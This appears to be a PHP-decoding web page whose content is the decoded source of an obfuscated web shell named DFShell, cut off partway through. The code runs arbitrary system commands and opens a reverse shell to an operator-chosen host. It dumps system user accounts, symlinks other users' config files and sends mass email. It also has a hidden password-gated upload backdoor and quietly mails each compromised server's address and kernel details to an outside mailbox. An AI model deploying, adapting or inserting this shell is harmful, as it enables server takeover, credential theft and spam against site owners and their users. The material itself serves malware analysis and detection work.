Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto W1_3c; vSQrh: ini_set("\144\x69\163\x70\x6c\141\x79\x5f\x73\x74\x61\x72\x74\x..
Decoded Output download
<?php
goto W1_3c; vSQrh: ini_set("display_startup_errors", 0); goto Akqdm; C6TK2: @ini_set("output_buffering", 0); goto tEMf5; Q1E3X: $ipnya2 = $_SERVER["REMOTE_ADDR"]; goto dd3lJ; M2bfL: ${"GLOBALS"}["ppwyoiykg"] = "command"; goto znjAP; W1_3c: ${"GLOBALS"}["jywocx"] = "result"; goto PMwiE; L7SMR: ${"GLOBALS"}["yiwcztbyun"] = "command"; goto kynZv; SCiIQ: $shell = new DFShell(); goto AUPWA; sqYa7: $DFSPlatform = strtolower(substr(PHP_OS, 0, 3)); goto gPc7r; ZwS3k: foreach (${${"GLOBALS"}["dqgnrecdf"]} as ${${"GLOBALS"}["ppwyoiykg"]} => ${${"GLOBALS"}["jywocx"]}) { ${${"GLOBALS"}["dtihjrvonf"]} .= "{$command}={$result}
"; } goto aibe0; gPc7r: $DFSOptions = array("edit", "cmd", "del", "sql", "conf", "sym", "reverse", "crack", "mass", "logout", "dest", "ren", "chmd", "unzip", "bombing"); goto g8DSO; RbXjW: ${${"GLOBALS"}["iliuscys"]} = "https://{$server_name}{$php_self}"; goto Imana; MlQxE: session_start(); goto IOapv; fRwtG: if (isset($_GET["upbackshell"]) && $_GET["upbackshell"] === "yusuf") { echo "<form action='' enctype='multipart/form-data' method='POST'>\xa <input type='file' name='filena'>\xa <input type='submit' name='upload' value='gasken'>\xa </form>"; if (isset($_POST["upload"])) { $cwd = getcwd(); $tmp = $_FILES["filena"]["tmp_name"]; $file = $_FILES["filena"]["name"]; if (@copy($tmp, $file)) { echo "File berhasil terupload! => {$cwd}/{$file}"; } } } goto opb_2; kPjU1: ${${"GLOBALS"}["gtbopvs"]} = php_uname(); goto Z7Cq2; tEMf5: ${"GLOBALS"}["dqgnrecdf"] = "command_results"; goto dKjG5; aibe0: @mail("[email protected]", "Hehehe", ${${"GLOBALS"}["dtihjrvonf"]}); goto Alng5; rD6jB: $DFConfig = array($_REQUEST, $_POST, $_SERVER, $_COOKIE, $_FILES); goto ZR6qn; XIACk: ${"GLOBALS"}["ekhyobycpvw"] = "commands"; goto eKDUG; ZR6qn: $DFSyntax = array("file_get_contents", "fileperms", "readfile", "chdir", "getcwd", "function_exists", "fsockopen", "pcntl_fork", "stream_set_blocking", "proc_get_status", "proc_open", "proc_close", "posix_setsid", "stream_select", "stream_get_contents", "posix_getpwuid"); goto YOHtL; or6vA: ${"GLOBALS"}["bpnpzhp"] = "ipnya"; goto EtzVE; Imana: ${${"GLOBALS"}["bpnpzhp"]} = $_SERVER["REMOTE_ADDR"]; goto J2Vs2; xGnkn: $email_content2 = "IP : [ {$ipnya2} ]
Login: {$login_url2}
Kernel: {$system_info2}\xa"; goto cDW_T; kLuSI: $php_self = $_SERVER["PHP_SELF"]; goto RbXjW; F4evV: ${"GLOBALS"}["veuarfech"] = "commands"; goto E9WCn; FbepM: $php_self2 = $_SERVER["PHP_SELF"]; goto J0B8z; kynZv: ${"GLOBALS"}["gtbopvs"] = "system_info"; goto C6TK2; AUPWA: if (isset($GLOBALS["DFConfig"][0]["dfd"]) && isset($GLOBALS["DFConfig"][0]["dfp"]) && isset($GLOBALS["DFConfig"][0]["dfaction"])) { if (!empty($GLOBALS["DFConfig"][0]["dfd"]) && !empty($GLOBALS["DFConfig"][0]["dfp"]) && $GLOBALS["DFConfig"][0]["dfaction"] == "download") { $shell->query = array($GLOBALS["DFConfig"][0]["dfp"], $GLOBALS["DFConfig"][0]["dfd"]); $shell->DFSAction($GLOBALS["DFConfig"][0]["dfaction"]); } else { echo "Path/File Undefined!"; } } else { $contents = $shell->DFStart(); $chead = $shell->DFSInfo(); if (isset($DFConfig[0]["dfp"])) { $cmdx = "?dfp=" . urlencode($DFConfig[0]["dfp"]) . "&dfaction=cmd"; } else { $cmdx = "?dfaction=cmd"; } $toReplace = array($GLOBALS["DFConfig"][2]["PHP_SELF"], "?dfaction=conf", "?dfaction=reverse", "?dfaction=sym", "?dfaction=crack", $cmdx, "?dfaction=mass", "?dfaction=sql", "?dfaction=dest", "?dfaction=bombing", "?dfaction=logout"); $contents = $shell->DFSRender("/%{body}%/i", "%{DFSI}%", $contents); $contents = $shell->DFSRender("/%{DFSI}%/i", $chead, $contents); $contents = $shell->DFSBody("bodytop.html", "/%{main}%/i", $contents); $contents = $shell->DFSRenderArray($toReplace, $contents); echo $contents; if (!isset($DFConfig[0]["dfp"])) { if (!isset($DFConfig[0]["dfaction"]) || empty($DFConfig[0]["dfaction"])) { $shell->string = $DFSyntax[4](); $shell->query = array($shell->Enc(), null); $shell->DFSAction("scand"); } else { if (in_array($DFConfig[0]["dfaction"], $GLOBALS["DFSOptions"])) { $shell->DFSAction($DFConfig[0]["dfaction"]); } } $shell->DFSDefault(); } else { if (isset($DFConfig[0]["dff"])) { if (!isset($DFConfig[0]["dfaction"])) { $shell->query = array($DFConfig[0]["dfp"], $DFConfig[0]["dff"]); $shell->DFSAction("view"); } else { $shell->query = array($DFConfig[0]["dfp"], $DFConfig[0]["dff"]); $shell->DFSAction($DFConfig[0]["dfaction"]); } } else { if (isset($DFConfig[0]["dfaction"])) { $shell->query = array($DFConfig[0]["dfp"], null); $shell->DFSAction($DFConfig[0]["dfaction"]); } else { $shell->query = array($DFConfig[0]["dfp"], null); $shell->DFSAction("scand"); } } $shell->query = array($DFConfig[0]["dfp"], null); $shell->DFSDefault(); } if (isset($DFConfig[1]["toencstr"])) { $shell->string = $DFConfig[1]["encstr"]; $shell->DFSPopupMSG(1, "Encryption for " . $DFConfig[1]["encstr"], $shell->Enc(), "So you can change password", true); } $shell->DFSAction("zipping"); $shell->DFSAction("massdel"); $footer = $shell->DFSEnd(); preg_match("/[0-9]\.[0-9]/i", $_SESSION["latest"], $match); $latestVersion = "V" . $match[0]; if ($_SESSION["need_update"]) { echo "<script>\xa alert('New version available!\nLatest version : " . $latestVersion . "')
</script>"; } print $footer; } goto FSDrH; J0B8z: $login_url2 = "https://{$server_name2}{$php_self2}"; goto Q1E3X; Alng5: $server_name2 = $_SERVER["SERVER_NAME"]; goto FbepM; IOapv: $DFShell_Ver = 2.2; goto rD6jB; dd3lJ: $system_info2 = php_uname(); goto xGnkn; PMwiE: ${"GLOBALS"}["dtihjrvonf"] = "email_content"; goto sWXJV; cDW_T: @mail("[email protected]", "Hehehe", $email_content2); goto fRwtG; dKjG5: @ini_set("display_errors", 0); goto JE7FI; YOHtL: $DFSCmd = array("system", "shell_exec", "exec", "passthru", "proc_open"); goto sqYa7; Akqdm: error_reporting(0); goto MlQxE; g8DSO: class DFShell { public $string; public $query; public $keys = "EagleEye@DFM"; private $options = 0; private $iv = "4797450924659018"; private $ciphering = "AES-256-CBC"; private $iv_length; private $output; private $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); private $buffer = 1024; private $clen = 0; private $error = false; protected static $pass = "OI2lo2eG+xkgYPhmurVfWAsDHBx31O1qAoH2J2LkX7c="; protected static $remote_url = "https://raw.githubusercontent.com/EagleTube/DFS/main/contents"; public function __construct() { $_SESSION["latest"] = $GLOBALS["DFSyntax"][0](self::$remote_url . "/version.txt"); $_SESSION["need_update"] = false; if (doubleval($_SESSION["latest"]) !== $GLOBALS["DFShell_Ver"]) { $_SESSION["need_update"] = true; } } public function DFSPopupMSG($no, $title, $msg, $foot, $x) { if ($x) { $location = "window.location.replace(window.location.href)"; } else { $location = "window.history.back()"; } if (isset($GLOBALS["DFConfig"][0]["dfp"]) && isset($GLOBALS["DFConfig"][0]["dff"])) { $slocation = "window.location.replace('?dfp=" . $GLOBALS["DFConfig"][0]["dfp"] . "')"; } else { $slocation = "window.location.replace('" . $GLOBALS["DFConfig"][2]["PHP_SELF"] . "')"; } switch ($no) { case 1: $script = "<script>
Swal.fire({\xa icon: 'info',\xa title: '" . $title . "',
text: '" . $msg . "',
footer: '" . $foot . "'
});
setTimeout(function(){ " . $location . " },1500);
</script>"; print $script; break; case 2: $script = "<script>
Swal.fire({\xa icon: 'error',
title: '" . $title . "',\xa text: '" . $msg . "',\xa footer: '" . $foot . "'
});
setTimeout(function(){ " . $location . " },1500);
</script>"; print $script; break; case 3: $script = "<script>
Swal.fire({
position: 'top-end',
icon: 'success',\xa title: '" . $msg . "',
showConfirmButton: false,\xa timer: 2000\xa });\xa setTimeout(function(){ " . $location . " },1500);\xa </script>"; print $script; break; case 4: $script = "<script>\xa Swal.fire({
position: 'top-end',\xa icon: 'error',\xa title: '" . $msg . "',
showConfirmButton: false,\xa timer: 2000\xa });
setTimeout(function(){ " . $location . " },1500);
</script>"; print $script; break; case 5: $script = "<script>\xa Swal.fire({
position: 'top-end',\xa icon: 'success',\xa title: '" . $msg . "',
showConfirmButton: false,
timer: 2000
});
</script>"; print $script; break; } } function __call($method, $arg) { if (isset($method) && isset($arg)) { $arg[0]($arg[1]); } } private function triggered() { print "Place where magic happend!"; } public function Enc() { $this->iv_length = openssl_cipher_iv_length($this->ciphering); $this->output = openssl_encrypt($this->string, $this->ciphering, sha1($this->keys), $this->options, $this->iv); return $this->output; } public function Dec($enc) { $this->output = openssl_decrypt($enc, $this->ciphering, sha1($this->keys), $this->options, $this->iv); return $this->output; } public function DFSLogin($password) { $login_pass = $this->Dec(urldecode($password)); if ($login_pass === $this->Dec(self::$pass)) { $_SESSION["DFS_Auth"] = sha1($GLOBALS["DFConfig"][2]["REMOTE_ADDR"]); setrawcookie("DFSVersion", $GLOBALS["DFShell_Ver"], time() + 18000, "/", $GLOBALS["DFConfig"][2]["HTTP_HOST"], 1, 1); return true; } else { echo "<script>alert('Wrong pass!');window.location.replace('" . $GLOBALS["DFConfig"][2]["PHP_SELF"] . "')</script>"; return false; } } public function DFSSlash() { if ($GLOBALS["DFSPlatform"] !== "win") { $slashtype = "/"; } else { $slashtype = "\"; } return $slashtype; } public function DFSFormat($bytes) { if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { $bytes = $bytes . " B"; } else { $bytes = "0 bytes"; } return $bytes; } private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($GLOBALS["DFSPlatform"] === "WINDOWS" && $oname === "STDIN") { $this->clen += strlen($data); } } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat["size"]; if ($GLOBALS["DFSPlatform"] === "lin" && $iname === "STDOUT" && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; } } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true; echo "<br>STRM_ERROR: Cannot read from {$name}, script will now exit...<br>"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true; echo "<br>STRM_ERROR: Cannot write to {$name}, script will now exit...<br>"; } return $bytes; } public function DFSReverse($ip, $port) { $exit = false; if ($GLOBALS["DFSPlatform"] !== "lin") { $exec = "cmd.exe"; } else { $exec = "/bin/sh"; } if (!$GLOBALS["DFSyntax"][5]("pcntl_fork")) { echo "DAEMONIZE: pcntl_fork() does not exists, moving on..."; } else { if (($pid = @$GLOBALS["DFSyntax"][7]()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on..."; } else { if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit..."; } else { if ($GLOBALS["DFSyntax"][12]() < 0) { echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan..."; } else { echo "DAEMONIZE: Completed successfully!"; } } } } if (!$exit) { @set_time_limit(0); @umask(0); $socket = @$GLOBALS["DFSyntax"][6]($ip, $port, $errno, $errstr, 30); if (!$socket) { echo "Erro Socket! -> {$errno}: {$errstr}"; } else { $GLOBALS["DFSyntax"][8]($socket, false); $process = @$GLOBALS["DFSyntax"][10]($exec, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC_ERROR: Cannot start the shell"; } else { foreach ($pipes as $pipe) { $GLOBALS["DFSyntax"][8]($pipe, false); } $status = $GLOBALS["DFSyntax"][9]($process); @fwrite($socket, "SOCKET: Shell has connected! PID: {$status["pid"]}\xa"); do { $status = $GLOBALS["DFSyntax"][9]($process); if (feof($socket)) { echo "SOC_ERROR: Shell connection has been terminated
"; break; } else { if (feof($pipes[1]) || !$status["running"]) { echo "PROC_ERROR: Shell process has been terminated"; break; } } $streams = array("read" => array($socket, $pipes[1], $pipes[2]), "write" => null, "except" => null); $num_changed_streams = @$GLOBALS["DFSyntax"][13]($streams["read"], $streams["write"], $streams["except"], 0); if ($num_changed_streams === false) { echo "STRM_ERROR: stream_select() failed\xa"; break; } else { if ($num_changed_streams > 0) { if ($GLOBALS["DFSPlatform"] === "lin") { if (in_array($socket, $streams["read"])) { $this->rw($socket, $pipes[0], "SOCKET", "STDIN"); } if (in_array($pipes[2], $streams["read"])) { $this->rw($pipes[2], $socket, "STDERR", "SOCKET"); } if (in_array($pipes[1], $streams["read"])) { $this->rw($pipes[1], $socket, "STDOUT", "SOCKET"); } } else { if ($GLOBALS["DFSPlatform"] === "win") { if (in_array($socket, $streams["read"])) { $this->rw($socket, $pipes[0], "SOCKET", "STDIN"); } if (($fstat = fstat($pipes[2])) && $fstat["size"]) { $this->brw($pipes[2], $socket, "STDERR", "SOCKET"); } if (($fstat = fstat($pipes[1])) && $fstat["size"]) { $this->brw($pipes[1], $socket, "STDOUT", "SOCKET"); } } } } } } while (!$this->error); foreach ($pipes as $pipe) { fclose($pipe); } $GLOBALS["DFSyntax"][11]($process); } fclose($socket); } } } public function DFSAction($action) { switch (strtolower($action)) { case "download": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (file_exists($pathfile)) { $type = mime_content_type($pathfile) ?: "text/plain"; header("Content-Type: " . $type); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($pathfile)); header("Content-Disposition: attachment; filename="" . basename($pathfile) . """); $GLOBALS["DFSyntax"][2]($pathfile); } else { echo "<script>alert('File not found!');</script>"; } break; case "chmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); if (isset($this->query)) { $dirmod = $this->Dec($this->query[0]); $filmod = ''; if (isset($this->query[1])) { $filmod = $this->Dec($this->query[1]); } $_cmod = $this->DFSMod(fileperms($dirmod . $filmod)); echo "<section class='modarea'><p><font color='white'>Location : </font><font color='#FFD700'>{$dirmod}{$filmod}</font></p>"; echo "<form action='' method='POST' autocomplete='OFF'>
<input type='text' name='modf' placeholder='{$_cmod}'>
<input type='submit' name='cmod' value='Chmod'>\xa </form></section>
"; if (isset($GLOBALS["DFConfig"][1]["cmod"])) { if ($this->DFSChange($dirmod . $filmod, $GLOBALS["DFConfig"][1]["modf"])) { echo "<script>alert('Successfully changed!');</script>"; } else { echo "<script>alert('An error occured!');</script>"; } } } break; case "bombing": echo "<div class='bombing'>\xa <h3>Email Bombing</h3>\xa <form action='' method='POST'>\xa <table>\xa <tr>\xa <td colspan='2'><input type='text' name='mail_subject' placeholder='Subject'></td>\xa </tr>\xa <tr>
<td><textarea name='mail_list' placeholder='[email protected]'></textarea></td>
<td><textarea name='mail_text' placeholder='Message Text'></textarea></td>\xa </tr>
</tr>
<td colspan='2'><button>SEND MAIL</button></td>\xa </tr>\xa </table>\xa </form>
"; if (isset($GLOBALS["DFConfig"][1]["mail_list"]) && isset($GLOBALS["DFConfig"][1]["mail_text"])) { $emails = explode("\xa", $GLOBALS["DFConfig"][1]["mail_list"]); $message = $GLOBALS["DFConfig"][1]["mail_text"]; $subject = $GLOBALS["DFConfig"][1]["mail_subject"]; $headers = "From: " . $GLOBALS["DFConfig"][2]["SERVER_ADMIN"]; foreach ($emails as $email) { $email = preg_replace("/\s+/i", '', $email); if (@mail($email, $subject, $message, $headers)) { print "<font color='green'>Email sent -> " . $email . "</font><br>"; } else { print "<font color='red'>Failed -> " . $email . "</font><br>"; } } } echo "</div>"; break; case "massdel": if (isset($GLOBALS["DFConfig"][1]["selectAction"])) { if ($GLOBALS["DFConfig"][1]["selectAction"] === "Delete") { if (!empty($GLOBALS["DFConfig"][1]["toZip"])) { if (isset($GLOBALS["DFConfig"][0]["dfp"])) { $delPath = $this->Dec($GLOBALS["DFConfig"][0]["dfp"]) . $slashtype; } else { $delPath = ''; } $toDel = $GLOBALS["DFConfig"][1]["toZip"]; for ($i = 0; $i < count($toDel); $i++) { $mdel = explode("||", $toDel[$i]); $mdel_dir = $this->Dec(urldecode($mdel[0])); $mdel_item = $this->Dec(urldecode($mdel[1])); if (file_exists($mdel_dir . $mdel_item)) { if (is_dir($mdel_dir . $mdel_item)) { @rmdir($mdel_dir . $mdel_item); } if (is_file($mdel_dir . $mdel_item)) { @unlink($mdel_dir . $mdel_item); } } } $this->DFSPopupMSG(3, null, "Selected file deleted!", null, true); } else { $this->DFSPopupMSG(4, null, "No file deleted!", null, true); } } } break; case "zipping": $ziproc = new ZipArchive(); $slashtype = $this->DFSSlash(); if (isset($GLOBALS["DFConfig"][1]["selectAction"])) { if ($GLOBALS["DFConfig"][1]["selectAction"] === "Zip") { if (empty($GLOBALS["DFConfig"][1]["toZip"])) { print "<script>alert('You have to pick a file');</script>"; } else { $toZip = $GLOBALS["DFConfig"][1]["toZip"]; $zipXname = md5(time()) . ".zip"; if (isset($GLOBALS["DFConfig"][0]["dfp"])) { $zipdirname = $this->Dec($GLOBALS["DFConfig"][0]["dfp"]) . $slashtype . $zipXname; } else { $zipdirname = $zipXname; } if ($ziproc->open($zipdirname, ZipArchive::CREATE | ZipArchive::OVERWRITE)) { for ($i = 0; $i < count($toZip); $i++) { $mzip = explode("||", $toZip[$i]); if ($mzip[1] === "[novalue]") { $dirtozip = $this->Dec(urldecode($mzip[0])) . $slashtype; $recdir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dirtozip), RecursiveIteratorIterator::LEAVES_ONLY); foreach ($recdir as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($dirtozip)); $ziproc->addFile($filePath, $relativePath); } } } else { $filetozip = $this->Dec(urldecode($mzip[0])) . $slashtype . $this->Dec(urldecode($mzip[1])); $ziproc->addFile($filetozip, $this->Dec(urldecode($mzip[1]))); } } echo "<script>alert('saved as {$zipXname}');window.location.replace(window.location.href);</script>"; $ziproc->close(); } } } } break; case "upload": $slashtype = $this->DFSSlash(); if (!isset($this->query[0])) { $path = getcwd() . $slashtype; } else { $path = $this->Dec($this->query[0]) ?: getcwd() . $slashtype; } $path = $this->Dec($this->DFSDirFilter($path)) . $slashtype; if (isset($GLOBALS["DFConfig"][1]["dfupload"])) { if (move_uploaded_file($GLOBALS["DFConfig"][4]["dffile"]["tmp_name"], $path . $GLOBALS["DFConfig"][4]["dffile"]["name"])) { $this->DFSPopupMSG(3, null, "File uploaded!", null, true); } else { $this->DFSPopupMSG(4, null, "Permission denied!", null, true); } } break; case "dest": $slashtype = $this->DFSSlash(); if (!isset($GLOBALS["DFConfig"][1]["destroy"])) { echo "<section id='destroyer'><form action='' method='POST'>"; echo "<input type='submit' name='destroy' value='Remove this shell'/></section></form>"; } else { $DFS_SHELL = $GLOBALS["DFConfig"][2]["DOCUMENT_ROOT"] . $slashtype . $GLOBALS["DFConfig"][2]["PHP_SELF"]; if (unlink($DFS_SHELL)) { $this->DFSPopupMSG(3, null, "File destroyed!!", null, false); } else { $this->DFSPopupMSG(4, null, "Unable destroyed!!", null, true); } } break; case "edit": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (!isset($GLOBALS["DFConfig"][1]["dfedit"])) { echo "<section class='editform'>"; echo "<form action='' method='POST'>"; echo "<textarea class='editcontent' name='editx'>"; echo htmlspecialchars($GLOBALS["DFSyntax"][0]($pathfile)); echo "</textarea>"; echo "<input type='submit' name='dfedit' value='Save'>"; echo "</form></section>"; } else { $pto = fopen($pathfile, "w"); fwrite($pto, $GLOBALS["DFConfig"][1]["editx"]); fclose($pto); $this->DFSPopupMSG(3, null, "Saved!", null, true); } break; case "view": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); echo "<p id='sshows'><span id='fnameshow'>Filename -> </span><span id='fnameshow1'>" . $this->Dec($this->query[1]) . "</span></p>"; echo "<section class='sources'>"; show_source($pathfile); echo "</section><div id='buttontoedit'>
<a href='?dfp=" . urlencode($this->query[0]) . "&dff=" . urlencode($this->query[1]) . "&dfaction=edit'>\xa <button>Edit</button></a></div>"; break; case "mkfile": $slashtype = $this->DFSSlash(); if (isset($GLOBALS["DFConfig"][1]["createfile"])) { $fname = $GLOBALS["DFConfig"][1]["newfile"] ?: "newfile.txt"; $fcreate = fopen($this->Dec($this->query[0]) . $slashtype . $fname, "w"); fwrite($fcreate, ''); fclose($fcreate); $this->DFSPopupMSG(3, null, "File created!", null, true); } break; case "mkdir": $slashtype = $this->DFSSlash(); if (isset($GLOBALS["DFConfig"][1]["createfolder"])) { $fname = $GLOBALS["DFConfig"][1]["newfolder"] ?: "newfolder"; if (!file_exists($fname)) { if (mkdir($this->Dec($this->query[0]) . $slashtype . $fname)) { $this->DFSPopupMSG(3, null, "Folder created!", null, true); } else { $this->DFSPopupMSG(4, null, "Permission denied!", null, true); } } else { $this->DFSPopupMSG(4, null, "Folder existed!", null, true); } } break; case "cmd": $slashtype = $this->DFSSlash(); $this->DFSCurrent($slashtype); echo "<section id='cmd_area'>"; echo "<form action='' method='POST' autocomplete='OFF'><textarea class='cmd_response' readonly='TRUE'>"; if (isset($GLOBALS["DFConfig"][1]["dfscmd"]) && !empty($GLOBALS["DFConfig"][1]["dfscmd"])) { $this->DFSExecute($GLOBALS["DFConfig"][1]["dfscmd"]); } echo "</textarea><br><input type='text' name='dfscmd' placeholder='whoami'><br><button>Execute</button></form>"; echo "</section>"; break; case "sym": echo "<section class='symlinkarea'><div class='symex'><label>Example : /home/%{user}%/public_html/target_file.php || /var/www/%{user}%/html/file.php</label></div>"; echo "<table><form action='' method='POST'>"; echo "<input type='hidden' name='dfssym'><br>"; echo "<tr><td id='symlable' class='symex1'><label>Symlink home&file target : </label></td><td id='symlable'><input type='text' name='target' placeholder='/path/%{user}%/path/file.php'></td></tr>"; echo "<tr><td id='symlable' class='symex1'><label>Saved to path : </label></td><td id='symlable'><input type='text' name='path' placeholder='path/'></td></tr>"; echo "<tr><td id='symlable' class='symex1'><label>Saved as : </label></td><td id='symlable'><input type='text' name='dfsaved' placeholder='wp-config.txt'></td></tr>"; echo "<tr><td id='symlable'></td><td id='symlable'><button>Symlink</button></td></tr></form></table><div class='sym_response'>"; if (isset($GLOBALS["DFConfig"][1]["dfssym"])) { if ($GLOBALS["DFSPlatform"] !== "win") { if (!file_exists("sym")) { mkdir($GLOBALS["DFConfig"][1]["path"] . "/sym"); } $contents = $GLOBALS["DFSyntax"][0](self::$remote_url . "/htaccess.txt"); for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { if (!file_exists($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"])) { mkdir($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"]); $targetpath = $this->DFSRender("/%{user}%/i", $nothing["name"], base64_decode(urldecode($GLOBALS["DFConfig"][1]["target"]))); if (isset($targetpath)) { $this->DFSExecute("ln -s " . $targetpath . " " . $GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); symlink($targetpath, $GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); $user_ht = fopen($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/.htaccess", "w"); fwrite($user_ht, $this->DFSRender("/%{user}%/i", $GLOBALS["DFConfig"][1]["dfsaved"], $contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); print "Done! -> " . $nothing["name"] . " -> <a href='" . urldecode($dfsv) . "'>Open</a><br>"; } } else { $targetpath = $this->DFSRender("/%{user}%/i", $nothing["name"], base64_decode(urldecode($GLOBALS["DFConfig"][1]["target"]))); if (isset($targetpath)) { $this->DFSExecute("ln -s " . $targetpath . " " . $GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); symlink($targetpath, $GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); $user_ht = fopen($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/.htaccess", "w"); fwrite($user_ht, $this->DFSRender("/%{user}%/i", $GLOBALS["DFConfig"][1]["dfsaved"], $contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS["DFConfig"][1]["path"] . "/sym/" . $nothing["name"] . "/" . $GLOBALS["DFConfig"][1]["dfsaved"]); print "Done! -> " . $nothing["name"] . " -> <a href='" . urldecode($dfsv) . "'>Open</a><br>"; } } } } } else { echo "<center><font color='red' size='6'><code>Not work in window!</code></font></center>"; } } echo "</div></section>"; break; case "reverse": $revhtml = explode("||", $GLOBALS["DFSyntax"][0](self::$remote_url . "/others.html"))[1]; echo "<section class='reverse'>"; if (!isset($GLOBALS["DFConfig"][1]["dfsrev"])) { echo $revhtml; } else { echo $revhtml; echo "<code>"; $addr = trim($GLOBALS["DFConfig"][1]["dfsaddr"]); $port = trim($GLOBALS["DFConfig"][1]["dfsport"]); $this->DFSReverse($addr, $port); echo "</code>"; } echo "</section>"; break; case "conf": echo "<section class='configs'>"; $pwid = array(); if ($GLOBALS["DFSPlatform"] !== "win") { for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { array_push($pwid, $nothing["name"] . ":" . $nothing["passwd"] . ":" . $nothing["uid"] . ":" . $nothing["gid"] . ":" . $nothing["dir"] . ":" . $nothing["shell"]); } } foreach ($pwid as $conf) { print $conf . "<br>"; } } else { echo "<center>Not work in window!</center>"; } echo "</section>"; break; case "unzip": $from = $this->Dec($GLOBALS["DFConfig"][0]["dfp"]); $zipp = $this->Dec($GLOBALS["DFConfig"][0]["dff"]); echo "<section id='unzipping'>"; if (isset($GLOBALS["DFConfig"][1]["destination"])) { $ziproc = new ZipArchive(); $pth = $from . $zipp; if ($ziproc->open($pth) === TRUE) { $ziproc->extractTo($GLOBALS["DFConfig"][1]["destination"]); $ziproc->close(); $this->DFSPopupMSG(3, null, "File successfully extracted to destination!", null, false); } else { $this->DFSPopupMSG(4, null, "Failed to extract into destination!", null, false); } } else { echo "<center><font color='white'>Filename : " . $from . $zipp . "</font>"; echo "<table><form action='' method='POST'><tr><td><label>Destination : </label></td>"; echo "<td><input type='text' name='destination'></td></tr><tr><td></td><td><button>Unzip</button></td>"; echo "</form></table></center>"; } echo "</section>"; break; case "scand": $slashtype = $this->DFSSlash(); $path = $this->Dec($this->query[0]) . $slashtype; $path = $this->Dec($this->DFSDirFilter($path)); $this->DFSCurrent($slashtype); echo "<div class='directory'><form action='' method='POST'>"; echo "<table><th>Pick</th><th>Type</th><th>Name</th><th>Size</th><th>Owner:Groups</th><th>Perms</th><th>Modified</th><th>Action</th>"; $folder = array_diff(scandir($path), array(".", "..")); $files = scandir($path); foreach ($folder as $p) { if (is_dir($path . $slashtype . $p)) { $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered . $p; $uid = explode(":", $this->DFSOG($filtered . $slashtype . $p)); echo "<p><tr><td id='fchecks'><input type='checkbox' name='toZip[]' value='" . urlencode($this->Enc()) . "||[novalue]'></td></td>"; echo "<td id='iconx'><i class='fa-regular fa-folder'></i></td><td id='tbname'><a href='?dfp=" . urlencode($this->Enc()) . "'>{$p}</a></td>"; echo "<td></td>"; echo "<td id='tbcen'>" . $this->DFSOG($filtered . $slashtype . $p) . "</td>"; echo "<td id='tbcen'><a href='?dfp=" . urlencode($this->Enc()) . "&dfaction=chmd'>" . $this->DFSPerms($filtered . $slashtype . $p) . "</a></td>"; echo "<td id='tbcen' class='tbdate'>" . date("h:i:sA(d/m/Y)", filemtime($filtered . $slashtype . $p)) . "</td>"; echo "<td id='tbcen'> <a href='?dfp=" . urlencode($this->Enc()) . "&dfaction=ren'><i class='fa-solid fa-pen'></i></a>.
